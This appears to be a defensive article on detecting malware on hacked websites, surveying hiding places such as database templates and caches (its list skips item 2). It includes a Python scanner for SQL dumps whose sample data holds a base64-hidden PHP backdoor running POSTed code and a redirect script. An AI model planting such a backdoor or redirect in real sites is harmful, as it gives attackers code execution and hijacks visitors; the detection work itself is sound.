Modern malicious and hacker scripts differ significantly from those of 3-5 years ago. Malware authors now combine obfuscation, encryption, decomposition into several pieces, external loading of the malicious code, and similar tricks in order to evade scanners and antivirus products. As a result, the detection rate of malicious code by scanners and antiviruses has fallen dramatically.
What should be done to detect viruses and hacker scripts on a site more reliably? Run an automated scan first, then follow it up with manual analysis.
First, let's look at exactly what to look for after a hack.
1. Hacker scripts. Most often, when a site is hacked, the files uploaded to it are web shells, backdoors, loaders, scripts for spam mailings, phishing pages plus their form handlers, doorways, and hack tool files.
3. Injections in the database. The database is the third target for a hacker. Here, static insertions are possible which redirect visitors to third-party resources, "spy" on them, or infect the visitor's computer or mobile device as the result of a drive-by attack (an attack using a hidden download). In addition, in many modern CMS (IPB, vBulletin, MODX, etc.) the templating tools allow PHP code to be executed, and the templates themselves are stored in the database, so the PHP code of web shells and backdoors can be embedded directly into the database.
4. Injections in caching services. As a result of an incorrect or unsafe configuration of a caching service, for example memcached, injections into the cached data are possible "on the fly". In some cases a hacker can inject malicious code into website pages without directly breaking into the site itself.
5. Injections into server system components. If a hacker gains root access to the server, he can replace components of the web server or caching server with infected ones. Such a web server will, on the one hand, give the attacker control over the server via control commands and, on the other hand, from time to time inject dynamic redirects and malicious code into website pages. As with an injection into a caching service, the site administrator will most likely be unable to detect that the site has been hacked, since all files and the database will be original. This option is the most difficult to clean up.
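The database injections described in item 3 are easy to miss with a file scanner, and the layered obfuscation mentioned at the start of the article means a plain `grep` for `<?php` is not enough either. The following is an added example (not code from the article) of a small checker that walks the `INSERT` rows of a SQL dump, unescapes each string value, peels off base64 layers, and flags PHP tags, dangerous functions and client-side redirects; the dump, table names and payload are constructed for illustration.

```python
import base64
import re

# Constructed sample SQL dump (not from the article): clean row, base64-hidden PHP backdoor, JS redirect.
SAMPLE_DUMP = r"""
INSERT INTO `templates` VALUES (1,'header','<div class=\"top\">{title}</div>');
INSERT INTO `templates` VALUES (2,'footer','<?php eval(base64_decode(\"ZXZhbCgkX1BPU1RbJ2MnXSk7\")); ?>');
INSERT INTO `posts` VALUES (3,'hello','<script>window.location=\"http://bad.example/x\";</script>');
"""

INSERT = re.compile(r"INSERT INTO `?(\w+)`? VALUES \((.*)\);")
STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")        # one quoted SQL string, backslash escapes allowed
B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")        # candidate base64 payloads inside a value
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
DANGEROUS = re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(|base64_decode|gzinflate", re.I)
REDIRECT = re.compile(r"window\.location|document\.location|http-equiv=[\"']?refresh|<iframe", re.I)

def decode_layers(text, depth=3):
    """Yield the text itself, then any printable base64 payloads hidden in it, a few layers deep."""
    yield text
    for m in B64.finditer(text):
        try:
            inner = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                                  # not real base64, or not text
        if depth and inner.isprintable():
            yield from decode_layers(inner, depth - 1)

def scan_dump(dump):
    """Return (table, dump line, layer, reason); layer 0 is the stored value, 1+ decoded payloads."""
    findings = []
    for line_no, line in enumerate(dump.strip().splitlines(), 1):
        m = INSERT.match(line)
        if not m:
            continue
        for raw in STRING.findall(m.group(2)):
            value = re.sub(r"\\(.)", r"\1", raw)      # undo SQL backslash escapes
            for layer, text in enumerate(decode_layers(value)):
                if PHP_TAG.search(text):
                    findings.append((m.group(1), line_no, layer, "php tag"))
                if DANGEROUS.search(text):
                    findings.append((m.group(1), line_no, layer, "dangerous function"))
                if REDIRECT.search(text):
                    findings.append((m.group(1), line_no, layer, "redirect/iframe"))
    return findings

if __name__ == "__main__":
    for finding in scan_dump(SAMPLE_DUMP):
        print("table=%s line=%d layer=%d: %s" % finding)
```

On the sample dump the clean header row produces nothing, the footer template is reported both for its raw `<?php eval(` and for the decoded `eval($_POST['c']);` payload one layer down, and the post row is reported for the redirect.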
So, let's say that you have already checked the files on the hosting and the database dump with scanners, but they found nothing, and the viral redirect is still on the page, or the mobile redirect still fires when pages are opened. Where do you look next?